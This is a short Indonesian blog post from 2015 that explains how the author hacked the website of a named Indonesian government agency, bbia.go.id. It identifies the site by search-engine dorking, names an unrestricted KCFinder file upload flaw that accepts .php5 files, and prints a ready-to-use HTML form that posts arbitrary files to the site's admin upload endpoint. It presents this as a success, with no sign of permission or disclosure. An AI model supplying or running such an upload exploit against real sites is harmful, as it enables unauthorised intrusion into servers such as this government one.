Rabu, 29 Juli 2015

Penetration Testing Website bbia.go.id

00.28 , 6 komentar :
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Balai Besar Industri Agro Indonesia , Lansung saja ke TKP !

Vulnerable Type : CSRF KCFinder File Upload
Can upload file : .php5 | php.pjpeg

Step satu kita cari kelemahan pada  web tersebut dengan melakukan dorking .

saya menemukan kcfinder file ? ya . disitu saya inget bahwa ckfinder mempunyai kelemahan .

saya coba upload.php dan ternyata error ? tidak
saya coba akali dan saya teringat pada csrf .

ok ini code csrf nya :

<title>CSRF Upload</title>
<form enctype="multipart/form-data"
action="http://bbia.go.id/bbia/admin/ckeditor/kcfinder/upload.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

upload file , dan berhasil /^_^


sekian dan terimakasih ..

Langganan: Postingan ( Atom )

Translate

GOOGLE+ FOLLOWERS

Formulir Kontak

Nama

Email *

Pesan *